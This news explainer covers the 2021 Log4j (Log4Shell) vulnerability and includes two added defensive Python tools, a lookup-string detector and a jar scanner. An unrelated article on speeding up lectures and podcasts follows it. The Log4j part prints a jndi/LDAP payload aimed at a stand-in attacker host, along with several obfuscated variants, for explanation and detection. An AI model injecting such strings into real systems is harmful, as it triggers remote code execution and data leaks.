Image: Archi Banal

Internet | December 16, 2021

Inside the security breach throwing the IT world into a panic


A new software vulnerability in a tool called Log4j has set the internet on fire as experts try to assess the impact and shore up their systems. Dylan Reeve explains the finer details for IRL

The latest security issue to sweep the internet has a perfect 10 out of 10 score for badness. That is, the newly discovered vulnerability in Log4j is considered as bad as it gets and may see many cybersecurity experts cancelling Christmas. 

“In the 15 or so years that I’ve been working in cybersecurity, this is probably the worst vulnerability I’ve seen,” said Adam Boileau, executive director of security testing and assurance at cyber security company CyberCX. “It’s one of the most interesting technically. The impact is not yet at the scale of NotPetya or Wannacry … but it will probably exceed them.”

We are constantly surrounded by technology, and it’s all at risk of security flaws. As these flaws are identified, they’re assessed with a Common Vulnerability Scoring System (CVSS) score from 0.1 (Pfft, whatever) to 10 (OMG! Everything is on fire!!).

Security issues with a CVSS score of 10 aren’t that unusual, but they usually pop up in somewhat obscure pieces of software where the impact is limited. They’re also often fixed before anyone even realises they exist. 

But the new Log4j vulnerability is different. Firstly it is a “0-day” vulnerability: the details became public, and attackers started using them, before a fixed version of the library was in most users’ hands, so defenders had effectively zero days to prepare. Secondly, it’s very widespread. In fact, it’s so widespread that no one really even knows how many products and services are affected. 

It is basically a worst case scenario: a very dangerous vulnerability, spread widely and being actively exploited right away.

In cybersecurity nerd speak, the Log4j bug is a remote code execution vulnerability. In short, this means someone (an attacker) can exploit a bug in the software to cause a program of their own design to run on a remote computer system or device. Once you can run your code on someone else’s computer, you can do pretty much anything you want.

Adam Boileau at CyberCX says this is the worst vulnerability he’s seen in his career. (Photo: supplied)

But taking it back a couple of steps, it’s useful to understand why Log4j, a software tool almost no one had heard of a week ago, is suddenly so critical.

Log4j is a software library — essentially a pre-made piece of computer code that can be incorporated into software by programmers to help them add functionality without having to reinvent the wheel. In this case it’s a library for logging, which is a very important aspect of programming. Log4j is a logging library for the Java programming language — Log4j = “logging for Java”, see? — that a large share of Java software has relied on for years. Logging allows a programmer to have their software generate a “log file” which contains important information about, for example, what user logged in, and when; what files were sent and received; what errors were encountered. 

All these logs are necessary to help users keep track of what the software is doing, and they also help developers figure out problems that have occurred with the software when it’s being used. 

The bug in Log4j comes thanks to a feature called “lookups”: when a message is written out, the library scans it for placeholders of the form ${…} and replaces them with a value (the current date, an environment variable, and so on). One of these lookups, the jndi lookup, tells the library to contact an external server through Java’s naming and directory interface (JNDI), typically an LDAP server, in order to get that value. It’s a fairly niche feature that most of the programmers using Log4j would never have even known about, but it meant that, in practice, anyone who could get text into a log message could force this logging library, embedded deep inside countless programs, to reach out to the internet and fetch a piece of data.

Any time Log4j is told to log a specially formatted piece of text, “${jndi:ldap://dangerous.zyx/code}” for example (dangerous.zyx is a made-up name standing in for an attacker’s server), it parses that as an instruction to contact a remote server in order to receive a piece of information. It will reach out to dangerous.zyx over LDAP and ask it for /code, then process whatever response it gets. If you, as an attacker, control dangerous.zyx, you can answer with a reference to a Java class hosted on a server of your own; affected Java runtimes download and run that class, so your code executes on whatever computer the message was logged on. Even where a newer runtime refuses to load a remote class, the response can still carry serialised Java objects that a vulnerable application turns into code execution, and the outgoing request on its own tells you the system is exploitable and can leak data (a lookup can embed an environment variable in the hostname it asks for). 

The Java installer used to advertise that 3 billion devices run Java. (Image: Dylan Reeve)

Because software tends to log a lot of what it receives, something as simple as a carefully constructed username, an email address on a sign-up form, a browser’s User-Agent header or a line typed into a game’s chat may be enough to trigger exploitation. The text only has to end up in a log message somewhere: if you can access a server or piece of software at all, there’s a good chance you can get it to log some piece of information you provide.
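To make the mechanism in the last few paragraphs concrete, here is an added example written for this article, not code from The Spinoff or from the Log4j project: a small Python check that does to an attacker’s string what Log4j’s lookup substitution does, expanding nested ${…} lookups innermost first and handling the lower/upper lookups and the “:-” default syntax that were used to disguise payloads, and then flags any string that resolves to a jndi lookup. The log lines and the dangerous.zyx host are constructed for the example, and the resolver is a deliberate subset of Log4j’s behaviour, so treat it as a detection aid rather than proof that a given system is safe.

```python
"""
Normalise and flag Log4Shell-style lookup strings in untrusted text.

Added example for this article; not code from The Spinoff or the Log4j
project. It re-implements, in simplified form, the part of Log4j 2's "${...}"
lookup handling that attackers leaned on (nested lookups, the lower/upper
lookups and the ":-" default-value syntax) so that obfuscated payloads seen
in the wild resolve to their plain "${jndi:...}" form before being checked.
The log lines at the bottom are constructed for the example.
"""
from __future__ import annotations

import urllib.parse
from dataclasses import dataclass, field

# Lookups resolved locally. Any other prefix (env, sys, date, ...) is treated
# as unresolvable and its text is kept, as Log4j keeps an unresolved variable.
_LOCAL_LOOKUPS = {
    "lower": lambda key: key.lower(),
    "upper": lambda key: key.upper(),
}
JNDI_MARKER = "<JNDI>"  # substituted for a jndi lookup; contains no "${"


@dataclass
class Verdict:
    normalised: str
    jndi_targets: list[str] = field(default_factory=list)

    @property
    def malicious(self) -> bool:
        return bool(self.jndi_targets)


def _innermost(text: str) -> tuple[int, int] | None:
    """Span of the rightmost "${...}", which cannot contain another "${"."""
    start = text.rfind("${")
    if start < 0:
        return None
    end = text.find("}", start)
    return None if end < 0 else (start, end + 1)


def _resolve(body: str, targets: list[str]) -> str:
    """Resolve one variable body (the text between "${" and "}")."""
    # "${name:-default}": the default applies when name cannot be resolved.
    name, sep, default = body.partition(":-")
    if not sep:
        default = None
    # Interpolator semantics: "prefix:key", prefix compared case-insensitively.
    prefix, colon, key = name.partition(":")
    prefix = prefix.lower()
    if colon and prefix == "jndi":
        targets.append(key)
        return JNDI_MARKER
    if colon and prefix in _LOCAL_LOOKUPS:
        return _LOCAL_LOOKUPS[prefix](key)
    if default is not None:
        return default
    # Unresolvable: keep the text but drop the "$" so the loop terminates.
    return "{" + body + "}"


def _substitute(text: str, targets: list[str]) -> str:
    """Expand lookups innermost-first, the way nested ${...} is evaluated."""
    for _ in range(10_000):  # hard cap against pathological input
        span = _innermost(text)
        if span is None:
            break
        start, end = span
        text = text[:start] + _resolve(text[start + 2:end - 1], targets) + text[end:]
    return text


def inspect(raw: str) -> Verdict:
    """Percent-decode (attackers send "%24%7B" for "${"), then normalise."""
    decoded = raw
    for _ in range(2):  # double encoding was common in scanning traffic
        nxt = urllib.parse.unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    targets: list[str] = []
    normalised = _substitute(decoded, targets)
    return Verdict(normalised, targets)


# Constructed sample lines (not real traffic), Apache combined-log style; the
# last field is the User-Agent header, a favourite carrier for the payload.
SAMPLE_LOG_LINES = [
    '203.0.113.7 - - [10/Dec/2021:14:02:11 +1300] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [10/Dec/2021:14:02:12 +1300] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://dangerous.zyx/code}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:13 +1300] "GET /api HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://dangerous.zyx/a}"',
    '203.0.113.10 - - [10/Dec/2021:14:02:14 +1300] "GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7Ddi%3Aldap%3A%2F%2Fdangerous.zyx%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.11 - - [10/Dec/2021:14:02:15 +1300] "GET /docs HTTP/1.1" 200 512 "-" "template ${user.name} in a harmless UA"',
]


def scan_log_lines(lines: list[str]) -> list[tuple[int, list[str]]]:
    """Return (line number, jndi targets) for every line carrying a lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        verdict = inspect(line)
        if verdict.malicious:
            hits.append((number, verdict.jndi_targets))
    return hits


if __name__ == "__main__":
    for number, targets in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {number}: jndi lookup(s) -> {targets}")
```

Run over an access log, this prints the lines whose User-Agent or query string resolves to a jndi lookup. The reason to resolve rather than grep for the literal text “jndi” is that scanners in the wild rarely sent that literal; they sent the disguised forms above, which only become “jndi:” once Log4j itself expands them.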

The other complication with this vulnerability is just how widely used Java is, and thus how widespread Log4j is. Java is very common in complex business applications, servers and even the software that runs inside hardware devices like modems, kitchen appliances and printers. Even software that isn’t written in Java may rely on services or components that are. Reports of the vulnerability have come from countless places, including Facebook, Apple’s iCloud, Minecraft and even devices like smart watches, cars and connected appliances.

Even systems that don’t include any Java themselves may still present a vulnerability to this bug. “In many situations, messages from one part of a business system are passed on to other systems,” explained CyberCX’s Boileau. “We’ve seen cases where a front end system wasn’t vulnerable, but it reported data into an internal database, which also wasn’t vulnerable, but then that data was later displayed in a desktop application that was vulnerable.” 

Every piece of software or hardware will have its own specific risks, and the process for determining risk can be complicated and time consuming. Various simple tests have been created, from scanners that search disks for copies of the library to checks that send a harmless lookup string and watch whether the system calls home, but the results won’t always be definitive and often further investigation or fixes will be necessary before any given system or device can be given a clean bill of health.
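One such test, as an added example (not The Spinoff’s or the Log4j project’s code): a Python script that walks a directory tree, opens every jar, WAR and EAR (including jars nested inside them, which is where application servers keep their libraries), reads the version from the pom.properties file Apache ships inside log4j-core, and reports whether the JndiLookup class is still present. The fix threshold of 2.15.0 is an assumption of this example (it is the first release that closed the original bug; later releases fixed further issues, so check the project’s current advisory for the version to target), and the jars the demo scans are constructed stand-ins built in a temporary directory. Note what such a scan cannot see: copies of Log4j inside products you only have as a running service, or a shaded jar whose version cannot be read, which the script reports conservatively as unknown and vulnerable.

```python
"""
Find Log4j 2 core jars on disk and report their version and whether the
JndiLookup class is still inside them.

Added example for this article; not code from The Spinoff or the Log4j
project. Assumptions: the fix threshold is 2.15.0 (the first release that
closed the original lookup bug; later releases fixed further issues), a jar is
recognised by the Maven pom.properties inside log4j-core or by its file name,
and nested archives (WEB-INF/lib inside a WAR, for instance) are scanned too.
The demo at the bottom builds constructed jars in a temporary directory.
"""
from __future__ import annotations

import io
import os
import re
import tempfile
import zipfile
from dataclasses import dataclass
from typing import Optional

POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
FIRST_FIXED = (2, 15, 0)  # assumption for this example, see docstring


@dataclass
class Finding:
    path: str                  # outer path, with "!" before a nested entry
    version: Optional[tuple]   # (major, minor, patch) or None if unknown
    jndi_lookup_present: bool

    @property
    def vulnerable(self) -> bool:
        """A 2.x core below the fixed release that still carries JndiLookup
        (removing that class was the documented stop-gap where upgrading
        was not possible)."""
        if not self.jndi_lookup_present:
            return False
        if self.version is None:
            return True  # version unknown (e.g. a shaded jar): be conservative
        return self.version[0] == 2 and self.version < FIRST_FIXED


def parse_version(text: str) -> Optional[tuple]:
    m = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)) if m else None


def version_from_pom(properties: str) -> Optional[tuple]:
    m = re.search(r"^version=(\S+)", properties, re.MULTILINE)
    return parse_version(m.group(1)) if m else None


def inspect_archive(zf: zipfile.ZipFile, label: str) -> list[Finding]:
    names = set(zf.namelist())
    findings: list[Finding] = []
    version = None
    if POM_PROPERTIES in names:
        version = version_from_pom(zf.read(POM_PROPERTIES).decode("utf-8", "replace"))
    elif "log4j-core-" in os.path.basename(label):
        version = parse_version(os.path.basename(label))
    if POM_PROPERTIES in names or JNDI_LOOKUP_CLASS in names or version is not None:
        findings.append(Finding(label, version, JNDI_LOOKUP_CLASS in names))
    for name in sorted(names):  # recurse into nested archives
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            findings.extend(inspect_archive(inner, f"{label}!{name}"))
    return findings


def scan(root: str) -> list[Finding]:
    findings: list[Finding] = []
    for dirpath, _, filenames in os.walk(root):
        for filename in sorted(filenames):
            if not filename.lower().endswith(ARCHIVE_SUFFIXES):
                continue
            path = os.path.join(dirpath, filename)
            try:
                with zipfile.ZipFile(path) as zf:
                    findings.extend(inspect_archive(zf, path))
            except zipfile.BadZipFile:
                continue
    return findings


def _fake_core_jar(version: str, with_jndi: bool = True) -> bytes:
    """Constructed stand-in for log4j-core: only the two entries we look at."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPERTIES, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if with_jndi:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder, not a real class
    return buf.getvalue()


def run_demo() -> dict[str, tuple]:
    """Build a constructed tree, scan it, return {relative path: (version, jndi present, vulnerable)}."""
    with tempfile.TemporaryDirectory() as root:
        def write(relpath: str, data: bytes) -> None:
            full = os.path.join(root, relpath)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as f:
                f.write(data)
        write("app/lib/log4j-core-2.14.1.jar", _fake_core_jar("2.14.1"))
        write("app/lib/log4j-core-2.16.0.jar", _fake_core_jar("2.16.0"))
        write("legacy/log4j-core-2.14.1.jar", _fake_core_jar("2.14.1", with_jndi=False))
        war = io.BytesIO()
        with zipfile.ZipFile(war, "w") as zf:
            zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", _fake_core_jar("2.14.1"))
        write("webapps/shop.war", war.getvalue())
        return {os.path.relpath(f.path, root): (f.version, f.jndi_lookup_present, f.vulnerable)
                for f in scan(root)}


if __name__ == "__main__":
    for path, (version, jndi, vuln) in sorted(run_demo().items()):
        print(f"{'VULNERABLE' if vuln else 'ok'}\t{path}\tversion={version}\tJndiLookup={jndi}")
```

Point scan() at a real application directory instead of the demo tree to use it in anger. A clean result from this kind of check says only that no vulnerable core jar was found on that disk; it says nothing about the other systems the article goes on to describe, where log messages are forwarded to a different machine that does the vulnerable logging.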

The big names, like Facebook, Google, IBM, Microsoft and Apple, acted within hours to mitigate potential harms within their core services. But for thousands of other software applications, the fixes may be a long time coming, and for millions of vulnerable hardware devices it’s possible a fix will never come. 

Log4j source code.

While this bug poses huge risks to corporate and enterprise customers, the risk to home users is probably more limited, according to Boileau. “Java hasn’t been popular in home computing for a while,” he said. “Most people with a modern computer probably aren’t going to be using much Java. Minecraft is the most obvious exception.” That’s right gamers: Minecraft’s Java Edition was affected, so make sure it is updated before you play.

However, as always, the advice to frequently update software remains a key first step in staying secure.

Less than a week into this specific security issue, it’s still unclear what potential harms could be waiting or how widely the impact will ultimately be felt, but many experts seem to think things will get worse in the coming weeks. It’s also likely that this flaw will have a very long tail, with many programs and devices even remaining vulnerable until they’re eventually scrapped entirely one day.

According to Boileau, most large enterprises and government agencies in New Zealand are already in the process of assessing and mitigating their risk. For smaller businesses, without dedicated IT and cybersecurity teams, his advice is to pay attention to the evolving advice. “There will be specific advice coming out frequently over the next few weeks or months about what products are at risk of being attacked, and what should be done,” he said. “Smaller businesses should be watching those closely and doing what they can to take whatever steps are recommended.” 

“If you know you have a Java application that isn’t critical, just turn it off,” Boileau added.

Image: Archi Banal

Internet | December 16, 2021

When you speed up content, you gain time. But what do you lose?


For IRL, Shanti Mathias discovers what’s gained and lost when you listen to your podcasts, YouTube videos and recorded lectures at double speed. 

I knew, even in that moment, that this was probably not an effective way to learn. But it was my first year of university, I’d been away for a few weeks, and I had some lectures to catch up on. It was early spring, and I also had to wax my legs. 

Picture this absurd situation: one leg balanced on the sink covered in sticky wax, laptop tucked behind the tap, notebook stabilised on the keyboard, pen askew – and a recorded anthropology lecture playing at two times the original speed. Rip a strip of hair, pause the lecture to scrawl down something that seemed important, press play, words about participant observation and historical materialism made blurry. I have a piece of paper that says I have a qualification in anthropology, but choosing to watch several weeks of foundational lectures sped up while doing other activities is probably why I still couldn’t tell you the difference between Malinowski and Mead.

In the age of Covid, where remote learning is becoming the norm, speeding up lectures on platforms like Panopto is a common practice among time-pressed students. But the fast-forward feature is found on many online platforms, including YouTube and most podcast apps – and I’m not the only one who uses it.

One way to understand the motivation to speed things up is as a consequence of capitalism. In the US, cable TV channels were found to be speeding up reruns of shows like Seinfeld by small amounts to fit more ad breaks into a half hour slot. “It’s the acceleration of modern life,” says Greg O’Beirne, a professor of audiology at the University of Canterbury. “People like to take control of their information.” 

More than 500 hours of video are uploaded to YouTube every minute, not to mention the video and audio on every other website. In this avalanche of content, going at 1.5 or double speed lets you watch a few more videos, listen to a few more podcasts.  

Greg O’Beirne, an audiology lecturer, studies how people hear and understand sounds. Does accelerated audio change how we learn? (Photo: supplied)

Speeding content up is theoretically more efficient for the time poor. “Since I have to work part time during uni, it’s a more efficient use of my time to speed through a 50 minute lecture in 25 minutes so I can go to work,” says Boston Flanagan-Connors, a law student living in Wellington. Flanagan-Connors watches most of his lectures sped up, and finds it a particularly useful revision tool – he watches back accelerated videos of lectures he attended in person to refresh his memory.

“Lectures go really slowly,” says Aden Jowsey, a masters student in Pōneke. Watching recorded lectures at speed was his gateway; he now watches four hours of YouTube a day at double speed. For Jowsey, this is recreational: the fast forward feature speeds the slow pace of competitive chess, allows him to watch video gamers sprint through challenges, and further compresses the already condensed wisdom of Ted talks.  

Does speeding content come at the cost of comprehension, though? “When I hear [that my students speed up their lectures] I feel a little worried,” says Sasha Calhoun, a senior lecturer in linguistics at Victoria University of Wellington. Calhoun studies prosody, or the role of rhythm and intonation in language.

I ask her what effect speed has on the information contained in language. “Length [of sound] is used for emphasis,” she says. Dragging out a sound draws the listener’s attention to it, indicating that the information in that sound is more important. When the sound you’re listening to is sped up, it’s harder to distinguish what matters – another reason I may have failed to absorb my high-speed anthropology lectures. 

That said, “some of the algorithms give excellent results,” O’Beirne says. In the last two decades, audio technology has advanced so sound can be accelerated without high-pitched distortion. While the exact algorithms vary, O’Beirne says sites like YouTube or Panopto will find the repeated sounds and overlap the audio, so the transitions are quicker, but the proportion of time a sound takes remains the same. 

These intelligent algorithms are doing something that people cannot. “The limitation that humans have that machines don’t is just how quickly our tongues and teeth can move – there’s a speed limit on our speech production,” Calhoun says. 

Sasha Calhoun studies the way meaning is conveyed through sound, which may change when it is sped up. (Photo: supplied)

But is there a speed limit on comprehension? O’Beirne notes that human reading speed – just your eyes and brain converting letters to meaning – is much faster than speech. While reading, human brains can absorb information at more than 300 words per minute, while normal speaking speed is 140 to 190 words per minute. Lectures and podcasts, which are often more clearly enunciated and structured than casual conversation, can be sped up without any drop in comprehension, up to a point. “After 315 words per minute, you may feel like you’re absorbing more information, but you’re not taking it all in,” O’Beirne says.

Retention of information also depends on how much attention you’re paying. “Any distortion in speech signal reduces intelligibility and increases the amount of effort you have to put in as a listener,” O’Beirne continues. “If you’re listening at a slow speed and your mind drifts, you can use context to fill the gaps.” If the sound is sped up, this is a problem: “You have to dedicate all your cognitive resources to decoding [and] be totally focused.” In other words, it is of course possible to listen to accelerated anthropology lectures while waxing your legs, but don’t make the mistake I did in expecting to learn anything. 

The human brain is remarkably adaptive, Calhoun says. “As we listen, we take in information about the social situation, contextual clues, emotional clues, [but] as we speed up the depth of processing goes down because we can’t spend as many cognitive resources [on noticing these things].” Sped-up audio reduces the ability to process information as you go, and conveying information on screens or speakers also reduces the social context that makes memories stick. 

Calhoun and O’Beirne are invested in the questions of language, learning, and listening that sped-up content raises. For day-to-day information consumers, however, these concerns are less pressing than a far more noticeable side-effect: it makes recorded voices speaking at regular speed sound absurd. “Once you go to two times [speed], you can’t go back,” says Jowsey. “The voices change, [normal speed] sounds too slow.” 

At this point, 1.25 times speed sounds relaxing to me, even normal. Walking into a room where I’m playing a podcast, my flatmates will ask why I’m speeding it up and I find myself almost ashamed that I can’t even notice a difference. 

What’s the line? Is any art sacred? “People would be horrified if they knew we were speeding things up, when they put a lot of effort in,” says O’Beirne, who often speeds up audiobooks to compensate for slow narrators. 

Aden Jowsey, a masters student, uses YouTube’s speed feature to watch up to four hours of videos a day. (Photo: supplied)

“[Speed] ruins the enjoyment for me,” says Flanagan-Connors. “I use it purely for information gathering, when I want to know the answer as quickly as possible.” He wouldn’t dream of speeding up TV, although some streaming sites offer this feature.

“I’m worried it’s not healthy,” says Jowsey, who nonetheless would recommend that others try speeding content up – he enjoys the commentary and tension of the chess world championships just as much at double speed. “I want to give my heartfelt thanks to whatever engineer or software designer … thought to add a speed multiplier. You are a genius, you are an innovator well beyond your time.” 

Flanagan-Connors, who has at least another year of law lectures to absorb, echoes Jowsey’s praise. “Whoever came up with the tech is my hero,” he says.

In this case, the fast-paced modern world is quite literally faster; most people can make the content they watch and listen to go more quickly if they want. But not everything can be adjusted. “Tell you what – I wish I could write my masters at two times speed,” says Jowsey, laughing.